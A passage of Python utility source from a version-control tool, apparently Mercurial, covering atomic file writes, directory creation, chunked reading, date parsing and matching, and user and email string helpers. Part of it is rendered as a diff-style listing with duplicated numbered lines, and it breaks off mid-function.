1696 if newstat.isambig(oldstat):
1698 # stat of changed file is ambiguous to original one
1697 # stat of changed file is ambiguous to original one
1699 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1698 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1700 os.utime(filename, (advanced, advanced))
1699 os.utime(filename, (advanced, advanced))
1701 else:
1700 else:
1702 rename(self._tempname, filename)
1701 rename(self._tempname, filename)
1703
1702
1704 def discard(self):
1703 def discard(self):
1705 if not self._fp.closed:
1704 if not self._fp.closed:
1706 try:
1705 try:
1707 os.unlink(self._tempname)
1706 os.unlink(self._tempname)
1708 except OSError:
1707 except OSError:
1709 pass
1708 pass
1710 self._fp.close()
1709 self._fp.close()
1711
1710
1712 def __del__(self):
1711 def __del__(self):
1713 if safehasattr(self, '_fp'): # constructor actually did something
1712 if safehasattr(self, '_fp'): # constructor actually did something
1714 self.discard()
1713 self.discard()
1715
1714
1716 def __enter__(self):
1715 def __enter__(self):
1717 return self
1716 return self
1718
1717
1719 def __exit__(self, exctype, excvalue, traceback):
1718 def __exit__(self, exctype, excvalue, traceback):
1720 if exctype is not None:
1719 if exctype is not None:
1721 self.discard()
1720 self.discard()
1722 else:
1721 else:
1723 self.close()
1722 self.close()
1724
1723
1725 def unlinkpath(f, ignoremissing=False):
1724 def unlinkpath(f, ignoremissing=False):
1726 """unlink and remove the directory if it is empty"""
1725 """unlink and remove the directory if it is empty"""
1727 if ignoremissing:
1726 if ignoremissing:
1728 tryunlink(f)
1727 tryunlink(f)
1729 else:
1728 else:
1730 unlink(f)
1729 unlink(f)
1731 # try removing directories that might now be empty
1730 # try removing directories that might now be empty
1732 try:
1731 try:
1733 removedirs(os.path.dirname(f))
1732 removedirs(os.path.dirname(f))
1734 except OSError:
1733 except OSError:
1735 pass
1734 pass
1736
1735
1737 def tryunlink(f):
1736 def tryunlink(f):
1738 """Attempt to remove a file, ignoring ENOENT errors."""
1737 """Attempt to remove a file, ignoring ENOENT errors."""
1739 try:
1738 try:
1740 unlink(f)
1739 unlink(f)
1741 except OSError as e:
1740 except OSError as e:
1742 if e.errno != errno.ENOENT:
1741 if e.errno != errno.ENOENT:
1743 raise
1742 raise
1744
1743
1745 def makedirs(name, mode=None, notindexed=False):
1744 def makedirs(name, mode=None, notindexed=False):
1746 """recursive directory creation with parent mode inheritance
1745 """recursive directory creation with parent mode inheritance
1747
1746
1748 Newly created directories are marked as "not to be indexed by
1747 Newly created directories are marked as "not to be indexed by
1749 the content indexing service", if ``notindexed`` is specified
1748 the content indexing service", if ``notindexed`` is specified
1750 for "write" mode access.
1749 for "write" mode access.
1751 """
1750 """
1752 try:
1751 try:
1753 makedir(name, notindexed)
1752 makedir(name, notindexed)
1754 except OSError as err:
1753 except OSError as err:
1755 if err.errno == errno.EEXIST:
1754 if err.errno == errno.EEXIST:
1756 return
1755 return
1757 if err.errno != errno.ENOENT or not name:
1756 if err.errno != errno.ENOENT or not name:
1758 raise
1757 raise
1759 parent = os.path.dirname(os.path.abspath(name))
1758 parent = os.path.dirname(os.path.abspath(name))
1760 if parent == name:
1759 if parent == name:
1761 raise
1760 raise
1762 makedirs(parent, mode, notindexed)
1761 makedirs(parent, mode, notindexed)
1763 try:
1762 try:
1764 makedir(name, notindexed)
1763 makedir(name, notindexed)
1765 except OSError as err:
1764 except OSError as err:
1766 # Catch EEXIST to handle races
1765 # Catch EEXIST to handle races
1767 if err.errno == errno.EEXIST:
1766 if err.errno == errno.EEXIST:
1768 return
1767 return
1769 raise
1768 raise
1770 if mode is not None:
1769 if mode is not None:
1771 os.chmod(name, mode)
1770 os.chmod(name, mode)
1772
1771
1773 def readfile(path):
1772 def readfile(path):
1774 with open(path, 'rb') as fp:
1773 with open(path, 'rb') as fp:
1775 return fp.read()
1774 return fp.read()
1776
1775
1777 def writefile(path, text):
1776 def writefile(path, text):
1778 with open(path, 'wb') as fp:
1777 with open(path, 'wb') as fp:
1779 fp.write(text)
1778 fp.write(text)
1780
1779
1781 def appendfile(path, text):
1780 def appendfile(path, text):
1782 with open(path, 'ab') as fp:
1781 with open(path, 'ab') as fp:
1783 fp.write(text)
1782 fp.write(text)
1784
1783
1785 class chunkbuffer(object):
1784 class chunkbuffer(object):
1786 """Allow arbitrary sized chunks of data to be efficiently read from an
1785 """Allow arbitrary sized chunks of data to be efficiently read from an
1787 iterator over chunks of arbitrary size."""
1786 iterator over chunks of arbitrary size."""
1788
1787
1789 def __init__(self, in_iter):
1788 def __init__(self, in_iter):
1790 """in_iter is the iterator that's iterating over the input chunks."""
1789 """in_iter is the iterator that's iterating over the input chunks."""
1791 def splitbig(chunks):
1790 def splitbig(chunks):
1792 for chunk in chunks:
1791 for chunk in chunks:
1793 if len(chunk) > 2**20:
1792 if len(chunk) > 2**20:
1794 pos = 0
1793 pos = 0
1795 while pos < len(chunk):
1794 while pos < len(chunk):
1796 end = pos + 2 ** 18
1795 end = pos + 2 ** 18
1797 yield chunk[pos:end]
1796 yield chunk[pos:end]
1798 pos = end
1797 pos = end
1799 else:
1798 else:
1800 yield chunk
1799 yield chunk
1801 self.iter = splitbig(in_iter)
1800 self.iter = splitbig(in_iter)
1802 self._queue = collections.deque()
1801 self._queue = collections.deque()
1803 self._chunkoffset = 0
1802 self._chunkoffset = 0
1804
1803
1805 def read(self, l=None):
1804 def read(self, l=None):
1806 """Read L bytes of data from the iterator of chunks of data.
1805 """Read L bytes of data from the iterator of chunks of data.
1807 Returns less than L bytes if the iterator runs dry.
1806 Returns less than L bytes if the iterator runs dry.
1808
1807
1809 If size parameter is omitted, read everything"""
1808 If size parameter is omitted, read everything"""
1810 if l is None:
1809 if l is None:
1811 return ''.join(self.iter)
1810 return ''.join(self.iter)
1812
1811
1813 left = l
1812 left = l
1814 buf = []
1813 buf = []
1815 queue = self._queue
1814 queue = self._queue
1816 while left > 0:
1815 while left > 0:
1817 # refill the queue
1816 # refill the queue
1818 if not queue:
1817 if not queue:
1819 target = 2**18
1818 target = 2**18
1820 for chunk in self.iter:
1819 for chunk in self.iter:
1821 queue.append(chunk)
1820 queue.append(chunk)
1822 target -= len(chunk)
1821 target -= len(chunk)
1823 if target <= 0:
1822 if target <= 0:
1824 break
1823 break
1825 if not queue:
1824 if not queue:
1826 break
1825 break
1827
1826
1828 # The easy way to do this would be to queue.popleft(), modify the
1827 # The easy way to do this would be to queue.popleft(), modify the
1829 # chunk (if necessary), then queue.appendleft(). However, for cases
1828 # chunk (if necessary), then queue.appendleft(). However, for cases
1830 # where we read partial chunk content, this incurs 2 dequeue
1829 # where we read partial chunk content, this incurs 2 dequeue
1831 # mutations and creates a new str for the remaining chunk in the
1830 # mutations and creates a new str for the remaining chunk in the
1832 # queue. Our code below avoids this overhead.
1831 # queue. Our code below avoids this overhead.
1833
1832
1834 chunk = queue[0]
1833 chunk = queue[0]
1835 chunkl = len(chunk)
1834 chunkl = len(chunk)
1836 offset = self._chunkoffset
1835 offset = self._chunkoffset
1837
1836
1838 # Use full chunk.
1837 # Use full chunk.
1839 if offset == 0 and left >= chunkl:
1838 if offset == 0 and left >= chunkl:
1840 left -= chunkl
1839 left -= chunkl
1841 queue.popleft()
1840 queue.popleft()
1842 buf.append(chunk)
1841 buf.append(chunk)
1843 # self._chunkoffset remains at 0.
1842 # self._chunkoffset remains at 0.
1844 continue
1843 continue
1845
1844
1846 chunkremaining = chunkl - offset
1845 chunkremaining = chunkl - offset
1847
1846
1848 # Use all of unconsumed part of chunk.
1847 # Use all of unconsumed part of chunk.
1849 if left >= chunkremaining:
1848 if left >= chunkremaining:
1850 left -= chunkremaining
1849 left -= chunkremaining
1851 queue.popleft()
1850 queue.popleft()
1852 # offset == 0 is enabled by block above, so this won't merely
1851 # offset == 0 is enabled by block above, so this won't merely
1853 # copy via ``chunk[0:]``.
1852 # copy via ``chunk[0:]``.
1854 buf.append(chunk[offset:])
1853 buf.append(chunk[offset:])
1855 self._chunkoffset = 0
1854 self._chunkoffset = 0
1856
1855
1857 # Partial chunk needed.
1856 # Partial chunk needed.
1858 else:
1857 else:
1859 buf.append(chunk[offset:offset + left])
1858 buf.append(chunk[offset:offset + left])
1860 self._chunkoffset += left
1859 self._chunkoffset += left
1861 left -= chunkremaining
1860 left -= chunkremaining
1862
1861
1863 return ''.join(buf)
1862 return ''.join(buf)
1864
1863
1865 def filechunkiter(f, size=131072, limit=None):
1864 def filechunkiter(f, size=131072, limit=None):
1866 """Create a generator that produces the data in the file size
1865 """Create a generator that produces the data in the file size
1867 (default 131072) bytes at a time, up to optional limit (default is
1866 (default 131072) bytes at a time, up to optional limit (default is
1868 to read all data). Chunks may be less than size bytes if the
1867 to read all data). Chunks may be less than size bytes if the
1869 chunk is the last chunk in the file, or the file is a socket or
1868 chunk is the last chunk in the file, or the file is a socket or
1870 some other type of file that sometimes reads less data than is
1869 some other type of file that sometimes reads less data than is
1871 requested."""
1870 requested."""
1872 assert size >= 0
1871 assert size >= 0
1873 assert limit is None or limit >= 0
1872 assert limit is None or limit >= 0
1874 while True:
1873 while True:
1875 if limit is None:
1874 if limit is None:
1876 nbytes = size
1875 nbytes = size
1877 else:
1876 else:
1878 nbytes = min(limit, size)
1877 nbytes = min(limit, size)
1879 s = nbytes and f.read(nbytes)
1878 s = nbytes and f.read(nbytes)
1880 if not s:
1879 if not s:
1881 break
1880 break
1882 if limit:
1881 if limit:
1883 limit -= len(s)
1882 limit -= len(s)
1884 yield s
1883 yield s
1885
1884
1886 def makedate(timestamp=None):
1885 def makedate(timestamp=None):
1887 '''Return a unix timestamp (or the current time) as a (unixtime,
1886 '''Return a unix timestamp (or the current time) as a (unixtime,
1888 offset) tuple based off the local timezone.'''
1887 offset) tuple based off the local timezone.'''
1889 if timestamp is None:
1888 if timestamp is None:
1890 timestamp = time.time()
1889 timestamp = time.time()
1891 if timestamp < 0:
1890 if timestamp < 0:
1892 hint = _("check your clock")
1891 hint = _("check your clock")
1893 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1892 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1894 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1893 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1895 datetime.datetime.fromtimestamp(timestamp))
1894 datetime.datetime.fromtimestamp(timestamp))
1896 tz = delta.days * 86400 + delta.seconds
1895 tz = delta.days * 86400 + delta.seconds
1897 return timestamp, tz
1896 return timestamp, tz
1898
1897
1899 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1898 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1900 """represent a (unixtime, offset) tuple as a localized time.
1899 """represent a (unixtime, offset) tuple as a localized time.
1901 unixtime is seconds since the epoch, and offset is the time zone's
1900 unixtime is seconds since the epoch, and offset is the time zone's
1902 number of seconds away from UTC.
1901 number of seconds away from UTC.
1903
1902
1904 >>> datestr((0, 0))
1903 >>> datestr((0, 0))
1905 'Thu Jan 01 00:00:00 1970 +0000'
1904 'Thu Jan 01 00:00:00 1970 +0000'
1906 >>> datestr((42, 0))
1905 >>> datestr((42, 0))
1907 'Thu Jan 01 00:00:42 1970 +0000'
1906 'Thu Jan 01 00:00:42 1970 +0000'
1908 >>> datestr((-42, 0))
1907 >>> datestr((-42, 0))
1909 'Wed Dec 31 23:59:18 1969 +0000'
1908 'Wed Dec 31 23:59:18 1969 +0000'
1910 >>> datestr((0x7fffffff, 0))
1909 >>> datestr((0x7fffffff, 0))
1911 'Tue Jan 19 03:14:07 2038 +0000'
1910 'Tue Jan 19 03:14:07 2038 +0000'
1912 >>> datestr((-0x80000000, 0))
1911 >>> datestr((-0x80000000, 0))
1913 'Fri Dec 13 20:45:52 1901 +0000'
1912 'Fri Dec 13 20:45:52 1901 +0000'
1914 """
1913 """
1915 t, tz = date or makedate()
1914 t, tz = date or makedate()
1916 if "%1" in format or "%2" in format or "%z" in format:
1915 if "%1" in format or "%2" in format or "%z" in format:
1917 sign = (tz > 0) and "-" or "+"
1916 sign = (tz > 0) and "-" or "+"
1918 minutes = abs(tz) // 60
1917 minutes = abs(tz) // 60
1919 q, r = divmod(minutes, 60)
1918 q, r = divmod(minutes, 60)
1920 format = format.replace("%z", "%1%2")
1919 format = format.replace("%z", "%1%2")
1921 format = format.replace("%1", "%c%02d" % (sign, q))
1920 format = format.replace("%1", "%c%02d" % (sign, q))
1922 format = format.replace("%2", "%02d" % r)
1921 format = format.replace("%2", "%02d" % r)
1923 d = t - tz
1922 d = t - tz
1924 if d > 0x7fffffff:
1923 if d > 0x7fffffff:
1925 d = 0x7fffffff
1924 d = 0x7fffffff
1926 elif d < -0x80000000:
1925 elif d < -0x80000000:
1927 d = -0x80000000
1926 d = -0x80000000
1928 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1927 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
1929 # because they use the gmtime() system call which is buggy on Windows
1928 # because they use the gmtime() system call which is buggy on Windows
1930 # for negative values.
1929 # for negative values.
1931 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1930 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
1932 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1931 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
1933 return s
1932 return s
1934
1933
1935 def shortdate(date=None):
1934 def shortdate(date=None):
1936 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1935 """turn (timestamp, tzoff) tuple into iso 8631 date."""
1937 return datestr(date, format='%Y-%m-%d')
1936 return datestr(date, format='%Y-%m-%d')
1938
1937
1939 def parsetimezone(s):
1938 def parsetimezone(s):
1940 """find a trailing timezone, if any, in string, and return a
1939 """find a trailing timezone, if any, in string, and return a
1941 (offset, remainder) pair"""
1940 (offset, remainder) pair"""
1942
1941
1943 if s.endswith("GMT") or s.endswith("UTC"):
1942 if s.endswith("GMT") or s.endswith("UTC"):
1944 return 0, s[:-3].rstrip()
1943 return 0, s[:-3].rstrip()
1945
1944
1946 # Unix-style timezones [+-]hhmm
1945 # Unix-style timezones [+-]hhmm
1947 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1946 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
1948 sign = (s[-5] == "+") and 1 or -1
1947 sign = (s[-5] == "+") and 1 or -1
1949 hours = int(s[-4:-2])
1948 hours = int(s[-4:-2])
1950 minutes = int(s[-2:])
1949 minutes = int(s[-2:])
1951 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1950 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
1952
1951
1953 # ISO8601 trailing Z
1952 # ISO8601 trailing Z
1954 if s.endswith("Z") and s[-2:-1].isdigit():
1953 if s.endswith("Z") and s[-2:-1].isdigit():
1955 return 0, s[:-1]
1954 return 0, s[:-1]
1956
1955
1957 # ISO8601-style [+-]hh:mm
1956 # ISO8601-style [+-]hh:mm
1958 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1957 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
1959 s[-5:-3].isdigit() and s[-2:].isdigit()):
1958 s[-5:-3].isdigit() and s[-2:].isdigit()):
1960 sign = (s[-6] == "+") and 1 or -1
1959 sign = (s[-6] == "+") and 1 or -1
1961 hours = int(s[-5:-3])
1960 hours = int(s[-5:-3])
1962 minutes = int(s[-2:])
1961 minutes = int(s[-2:])
1963 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1962 return -sign * (hours * 60 + minutes) * 60, s[:-6]
1964
1963
1965 return None, s
1964 return None, s
1966
1965
1967 def strdate(string, format, defaults=None):
1966 def strdate(string, format, defaults=None):
1968 """parse a localized time string and return a (unixtime, offset) tuple.
1967 """parse a localized time string and return a (unixtime, offset) tuple.
1969 if the string cannot be parsed, ValueError is raised."""
1968 if the string cannot be parsed, ValueError is raised."""
1970 if defaults is None:
1969 if defaults is None:
1971 defaults = {}
1970 defaults = {}
1972
1971
1973 # NOTE: unixtime = localunixtime + offset
1972 # NOTE: unixtime = localunixtime + offset
1974 offset, date = parsetimezone(string)
1973 offset, date = parsetimezone(string)
1975
1974
1976 # add missing elements from defaults
1975 # add missing elements from defaults
1977 usenow = False # default to using biased defaults
1976 usenow = False # default to using biased defaults
1978 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1977 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
1979 part = pycompat.bytestr(part)
1978 part = pycompat.bytestr(part)
1980 found = [True for p in part if ("%"+p) in format]
1979 found = [True for p in part if ("%"+p) in format]
1981 if not found:
1980 if not found:
1982 date += "@" + defaults[part][usenow]
1981 date += "@" + defaults[part][usenow]
1983 format += "@%" + part[0]
1982 format += "@%" + part[0]
1984 else:
1983 else:
1985 # We've found a specific time element, less specific time
1984 # We've found a specific time element, less specific time
1986 # elements are relative to today
1985 # elements are relative to today
1987 usenow = True
1986 usenow = True
1988
1987
1989 timetuple = time.strptime(encoding.strfromlocal(date),
1988 timetuple = time.strptime(encoding.strfromlocal(date),
1990 encoding.strfromlocal(format))
1989 encoding.strfromlocal(format))
1991 localunixtime = int(calendar.timegm(timetuple))
1990 localunixtime = int(calendar.timegm(timetuple))
1992 if offset is None:
1991 if offset is None:
1993 # local timezone
1992 # local timezone
1994 unixtime = int(time.mktime(timetuple))
1993 unixtime = int(time.mktime(timetuple))
1995 offset = unixtime - localunixtime
1994 offset = unixtime - localunixtime
1996 else:
1995 else:
1997 unixtime = localunixtime + offset
1996 unixtime = localunixtime + offset
1998 return unixtime, offset
1997 return unixtime, offset
1999
1998
2000 def parsedate(date, formats=None, bias=None):
1999 def parsedate(date, formats=None, bias=None):
2001 """parse a localized date/time and return a (unixtime, offset) tuple.
2000 """parse a localized date/time and return a (unixtime, offset) tuple.
2002
2001
2003 The date may be a "unixtime offset" string or in one of the specified
2002 The date may be a "unixtime offset" string or in one of the specified
2004 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2003 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2005
2004
2006 >>> parsedate(' today ') == parsedate(\
2005 >>> parsedate(' today ') == parsedate(\
2007 datetime.date.today().strftime('%b %d'))
2006 datetime.date.today().strftime('%b %d'))
2008 True
2007 True
2009 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2008 >>> parsedate( 'yesterday ') == parsedate((datetime.date.today() -\
2010 datetime.timedelta(days=1)\
2009 datetime.timedelta(days=1)\
2011 ).strftime('%b %d'))
2010 ).strftime('%b %d'))
2012 True
2011 True
2013 >>> now, tz = makedate()
2012 >>> now, tz = makedate()
2014 >>> strnow, strtz = parsedate('now')
2013 >>> strnow, strtz = parsedate('now')
2015 >>> (strnow - now) < 1
2014 >>> (strnow - now) < 1
2016 True
2015 True
2017 >>> tz == strtz
2016 >>> tz == strtz
2018 True
2017 True
2019 """
2018 """
2020 if bias is None:
2019 if bias is None:
2021 bias = {}
2020 bias = {}
2022 if not date:
2021 if not date:
2023 return 0, 0
2022 return 0, 0
2024 if isinstance(date, tuple) and len(date) == 2:
2023 if isinstance(date, tuple) and len(date) == 2:
2025 return date
2024 return date
2026 if not formats:
2025 if not formats:
2027 formats = defaultdateformats
2026 formats = defaultdateformats
2028 date = date.strip()
2027 date = date.strip()
2029
2028
2030 if date == 'now' or date == _('now'):
2029 if date == 'now' or date == _('now'):
2031 return makedate()
2030 return makedate()
2032 if date == 'today' or date == _('today'):
2031 if date == 'today' or date == _('today'):
2033 date = datetime.date.today().strftime('%b %d')
2032 date = datetime.date.today().strftime('%b %d')
2034 elif date == 'yesterday' or date == _('yesterday'):
2033 elif date == 'yesterday' or date == _('yesterday'):
2035 date = (datetime.date.today() -
2034 date = (datetime.date.today() -
2036 datetime.timedelta(days=1)).strftime('%b %d')
2035 datetime.timedelta(days=1)).strftime('%b %d')
2037
2036
2038 try:
2037 try:
2039 when, offset = map(int, date.split(' '))
2038 when, offset = map(int, date.split(' '))
2040 except ValueError:
2039 except ValueError:
2041 # fill out defaults
2040 # fill out defaults
2042 now = makedate()
2041 now = makedate()
2043 defaults = {}
2042 defaults = {}
2044 for part in ("d", "mb", "yY", "HI", "M", "S"):
2043 for part in ("d", "mb", "yY", "HI", "M", "S"):
2045 # this piece is for rounding the specific end of unknowns
2044 # this piece is for rounding the specific end of unknowns
2046 b = bias.get(part)
2045 b = bias.get(part)
2047 if b is None:
2046 if b is None:
2048 if part[0:1] in "HMS":
2047 if part[0:1] in "HMS":
2049 b = "00"
2048 b = "00"
2050 else:
2049 else:
2051 b = "0"
2050 b = "0"
2052
2051
2053 # this piece is for matching the generic end to today's date
2052 # this piece is for matching the generic end to today's date
2054 n = datestr(now, "%" + part[0:1])
2053 n = datestr(now, "%" + part[0:1])
2055
2054
2056 defaults[part] = (b, n)
2055 defaults[part] = (b, n)
2057
2056
2058 for format in formats:
2057 for format in formats:
2059 try:
2058 try:
2060 when, offset = strdate(date, format, defaults)
2059 when, offset = strdate(date, format, defaults)
2061 except (ValueError, OverflowError):
2060 except (ValueError, OverflowError):
2062 pass
2061 pass
2063 else:
2062 else:
2064 break
2063 break
2065 else:
2064 else:
2066 raise error.ParseError(_('invalid date: %r') % date)
2065 raise error.ParseError(_('invalid date: %r') % date)
2067 # validate explicit (probably user-specified) date and
2066 # validate explicit (probably user-specified) date and
2068 # time zone offset. values must fit in signed 32 bits for
2067 # time zone offset. values must fit in signed 32 bits for
2069 # current 32-bit linux runtimes. timezones go from UTC-12
2068 # current 32-bit linux runtimes. timezones go from UTC-12
2070 # to UTC+14
2069 # to UTC+14
2071 if when < -0x80000000 or when > 0x7fffffff:
2070 if when < -0x80000000 or when > 0x7fffffff:
2072 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2071 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2073 if offset < -50400 or offset > 43200:
2072 if offset < -50400 or offset > 43200:
2074 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2073 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2075 return when, offset
2074 return when, offset
2076
2075
def matchdate(date):
    """Return a function that matches a given date match specifier

    Formats include:

    '{date}' match a given date to the accuracy provided

    '<{date}' on or before a given date

    '>{date}' on or after a given date

    >>> p1 = parsedate("10:29:59")
    >>> p2 = parsedate("10:30:00")
    >>> p3 = parsedate("10:30:59")
    >>> p4 = parsedate("10:31:00")
    >>> p5 = parsedate("Sep 15 10:30:00 1999")
    >>> f = matchdate("10:30")
    >>> f(p1[0])
    False
    >>> f(p2[0])
    True
    >>> f(p3[0])
    True
    >>> f(p4[0])
    False
    >>> f(p5[0])
    False
    """

    def lower(date):
        # round unknown fields down (Jan 1st, 00:00:00)
        d = {'mb': "1", 'd': "1"}
        return parsedate(date, extendeddateformats, d)[0]

    def upper(date):
        # round unknown fields up (Dec 31st, 23:59:59); try successively
        # shorter month lengths until parsedate accepts the day number
        d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
        for days in ("31", "30", "29"):
            try:
                d["d"] = days
                return parsedate(date, extendeddateformats, d)[0]
            except error.ParseError:
                # parsedate raises ParseError (not Abort) for an invalid
                # date such as "Feb 31"; fall through to the next length
                pass
        d["d"] = "28"
        return parsedate(date, extendeddateformats, d)[0]

    date = date.strip()

    if not date:
        raise Abort(_("dates cannot consist entirely of whitespace"))
    elif date[0] == "<":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '<DATE'"))
        when = upper(date[1:])
        return lambda x: x <= when
    elif date[0] == ">":
        if not date[1:]:
            raise Abort(_("invalid day spec, use '>DATE'"))
        when = lower(date[1:])
        return lambda x: x >= when
    elif date[0] == "-":
        # "-N": anything newer than N days ago
        try:
            days = int(date[1:])
        except ValueError:
            raise Abort(_("invalid day spec: %s") % date[1:])
        if days < 0:
            raise Abort(_("%s must be nonnegative (see 'hg help dates')")
                        % date[1:])
        when = makedate()[0] - days * 3600 * 24
        return lambda x: x >= when
    elif " to " in date:
        # inclusive range between two dates
        a, b = date.split(" to ")
        start, stop = lower(a), upper(b)
        return lambda x: x >= start and x <= stop
    else:
        # a single date matches the whole span it covers at its accuracy
        start, stop = lower(date), upper(date)
        return lambda x: x >= start and x <= stop
2152
2151
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test('abcdefg', 'abc', 'def', 'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test('re:a.+b', 'nomatch', 'fooadef', 'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test('literal:re:foobar', 'foobar', 're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test('foo:bar', 'foo', 'bar', 'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest('re:A.+b', 'nomatch', 'fooadef', 'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest('ABCDEFG', 'abc', 'def', 'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        flags = 0 if casesensitive else remod.I
        try:
            regex = remod.compile(pattern, flags)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        match = pattern.__eq__
    else:
        # compare both sides in a case-normalized form
        ipat = encoding.lower(pattern)
        match = lambda s: ipat == encoding.lower(s)
    return 'literal', pattern, match
2211
2210
def shortuser(user):
    """Return a short representation of a user name or email address."""
    # drop an email domain, then anything up to and including the first
    # '<', then truncate at the first space and the first dot
    user = user.partition('@')[0]
    user = user.split('<', 1)[-1]
    user = user.partition(' ')[0]
    return user.partition('.')[0]
2227
2226
def emailuser(user):
    """Return the user portion of an email address."""
    # strip the domain first, then anything before an opening '<'
    user = user.partition('@')[0]
    return user.split('<', 1)[-1]
2237
2236
def email(author):
    '''get email of author.'''
    # take the span between '<' and '>'; either bracket may be missing,
    # in which case the slice is open on that side
    start = author.find('<') + 1
    end = author.find('>')
    if end == -1:
        return author[start:]
    return author[start:end]
2244
2243
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    # delegates to encoding.trim, passing '...' as the truncation marker
    # (NOTE(review): exact column/trim semantics are defined by
    # encoding.trim — confirm there)
    return encoding.trim(text, maxlength, ellipsis='...')
2248
2247
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def render(count):
        # pick the first unit whose threshold the magnitude reaches;
        # entries are (threshold-multiplier, divisor, format-string)
        for threshold, divisor, fmt in unittable:
            if abs(count) >= divisor * threshold:
                return fmt % (count / float(divisor))
        # nothing matched (e.g. count == 0): use the last, smallest unit
        return unittable[-1][2] % count

    return render
2259
2258
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    # reject a reversed range first, then a non-positive starting line
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    return fromline - 1, toline
2280
2279
# Render a byte count as a human-readable string. Entries run from the
# largest unit to the smallest, and within each unit from the coarsest
# precision to the finest, so the first threshold reached wins.
bytecount = unitcountfn(
    (100, 1 << 30, _('%.0f GB')),
    (10, 1 << 30, _('%.1f GB')),
    (1, 1 << 30, _('%.2f GB')),
    (100, 1 << 20, _('%.0f MB')),
    (10, 1 << 20, _('%.1f MB')),
    (1, 1 << 20, _('%.2f MB')),
    (100, 1 << 10, _('%.0f KB')),
    (10, 1 << 10, _('%.1f KB')),
    (1, 1 << 10, _('%.2f KB')),
    (1, 1, _('%.0f bytes')),
    )
2293
2292
# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    # normalize every CR*LF line ending to a bare LF
    return _eolre.sub('\n', s)

def tocrlf(s):
    # normalize every line ending to CRLF
    return _eolre.sub('\r\n', s)

if pycompat.oslinesep == '\r\n':
    # Windows: native line separator is CRLF
    tonativeeol = tocrlf
    fromnativeeol = tolf
else:
    # POSIX: LF is already native, so both conversions are no-ops
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
2311
2310
def escapestr(s):
    """Return s with backslash escape sequences applied.

    Calls the underlying codec function of s.encode('string_escape')
    directly, because bytes.encode() does not accept bytes-to-bytes
    codecs on Python 3.
    """
    escaped, consumed = codecs.escape_encode(s)
    return escaped
2316
2315
def unescapestr(s):
    """Decode backslash escape sequences in s (inverse of escapestr)."""
    decoded, consumed = codecs.escape_decode(s)
    return decoded
2319
2318
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        return pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy: round-trip through the local
        # encoding instead of failing outright
